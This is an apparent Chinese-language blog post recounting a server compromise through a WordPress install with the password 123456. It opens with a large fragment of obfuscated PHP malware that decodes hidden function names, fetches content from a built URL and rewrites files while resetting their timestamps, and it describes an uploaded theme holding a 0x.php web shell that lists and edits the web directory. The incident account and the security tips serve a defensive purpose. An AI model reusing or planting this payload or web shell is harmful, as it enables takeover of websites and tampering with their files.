hTdN9Le/tP3zAIA\');$O_0_OO00O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'e9o3/hT+ny7qdtrU/X7XytP/ZxYA\');$O0O_0__OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'e7Gh+hTfmUFU/bWp+u2/ltP+zywA\');$OO0_O_00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'ARIA7hTf/kv67mlLnlkI7lhoXlrrntPvvJo=\');$O_O00O0O__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'e7p2xhTtMtP5KwA=\');$O0_OO0O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'e7F9/hTdN9Le/tP3zAIA\');$OO___O00O0=\'<br>\';$O0O_O0__O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'08/MShT0mt0CvtPIKAAA\');$O__00O_O0O=\'{#z#}\';$O__O0O_0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'C8rPchTzYrNU3PKy5tPIBAA=\');$OO0O0O___0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'C3APKhTkjJdCqIcjHIjDSyLE1xDytNcfbUDvAIykn1CMpIzg3L8PTwKksx9rX0zPIs9wr2TAeqK06uMsj0C3HM8cwtPysQUA\');$OOOO0___00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'C3C2NhTIiKyDCIjPDKiQwxsfAxCipIyTKtPxBQA=\');$OO0_0O_0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'S/QIMhTkh2ybctPFAA==\');$OOO0O__00_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'SzF2LhTIkMDypJDDcpg9KtP2AA==\');echo $OOO__0O00_.$O__O0O00_O.$OO___O00O0;$O_O00__0OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x30\x4f\x4f\x5f\x5f"]($O__O0O00_O.$O0O_O0__O0);echo $O_0_OO00O_.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OO0O0O___0).$O_O00__0OO.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OOOO0___00);if($O__0O_0O0O!=\'\'){$OO_00_O_O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x4f\x5f"](\'Ky8vNhTzSz0CvLTy9NLS4tKErNTS1PTUosLUnLLCnOyC/QK0/tPMSwcA\');$O_0O00O_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OO0_0O_0_O);$O_O_0O0O0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OOO0O__00_);$O0O0O0O___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x30\x30\x5f\x5f\x4f\x5f"]($O_0O00O_O_.\'//\'.$OO_00_O_O0.\'/\'.$O_O_0O0O0_.\'/\'.$OO0_O_0O_0);$O0O0O0O___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x30\x5f\x5f\x4f\x5f\x4f"]($O__00O_O0O,$O__0O_0O0O,$O0O0O0O___);if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x5f\x4f\x4f\x5f\x5f\x30"]($O_O00__0OO,$O__O0O_0O0)){echo $O0O_0__OO0.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OO0O0O___0).$O0O0O0O___.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OOOO0___00);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x30\x30\x30\x5f\x4f"]($O__O0O00_O.$O0O_O0__O0,0644);$O_O00O__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x4f\x30\x30\x5f\x30\x4f"]($O__O0O00_O.$O0O_O0__O0);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x5f\x4f\x5f\x4f\x30\x5f\x30"]($O__O0O00_O.$O0O_O0__O0,$O0O0O0O___.$O_O00__0OO);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x30\x4f\x5f\x5f\x5f"]($O__O0O00_O.$O0O_O0__O0,$O_O00O__0O);$O_O00__0OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x5f\x30\x4f\x4f\x5f\x5f"]($O__O0O00_O.$O0O_O0__O0);echo $OO0_O_00_O.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OO0O0O___0).$O_O00__0OO.${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x5f\x30\x4f\x4f\x30\x4f"]($OOOO0___00);}else{echo $O_O00O0O__;}}if($OO0O__O0_0!=\'\'){$OO_000O_O_=$O__O0O00_O.\'/\'.$OO0O__O0_0;if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x5f"]($OO_000O_O_)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x30\x5f\x4f\x30"]($OO_000O_O_);}}');${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]();?>

内容大部分都被转义了,一下子很难明白干了什么,当时很晚了,就把文件都删了,然后访问了下大部分业务系统,发现正常,就睡觉去了。

想着第二天查查什么原因,结果同事发现很多文件夹的修改时间都变成第二天早上的时间了,商量了下觉得攻击文件应该还没有被清理掉,但又不知道从哪开始着手,先把所有的文件夹查一遍,结果熟悉的 WordPress 出现在眼前。

我记忆中服务器上应该没有安装 WordPress 系统,回想起最近做了一次服务器系统迁移,然后点击 wp-content/themes 文件查看,果然发现一个非默认的官方主题被上传过,进一步查看有一个奇怪 0x.php 文件,然后试着通过域名访问这个 0x.php 文件,结果吓一跳,服务器 web 目录所有目录及文件都被列出来,还能执行 增,删,改 的操作。唉,平时一再强调的安全操作被忽视才造成这次事件。

基本的安全意识:

  1. 密码尽量复杂,此次就因为 WordPress 的密码 123456,攻击者登陆能够上传包含攻击代码的主题
  2. 目录及文件读写权限一定要控制,因为 web 目录全是 www 用户权限,攻击代码才有了 增删改 的能力
  3. 最重要的是养成安全意识
  4. 还有…等等

经过一整天的排查,目前没有发现重大问题,也是万幸啦。

发表评论

电子邮件地址不会被公开。 必填项已用*标注

Scroll to Top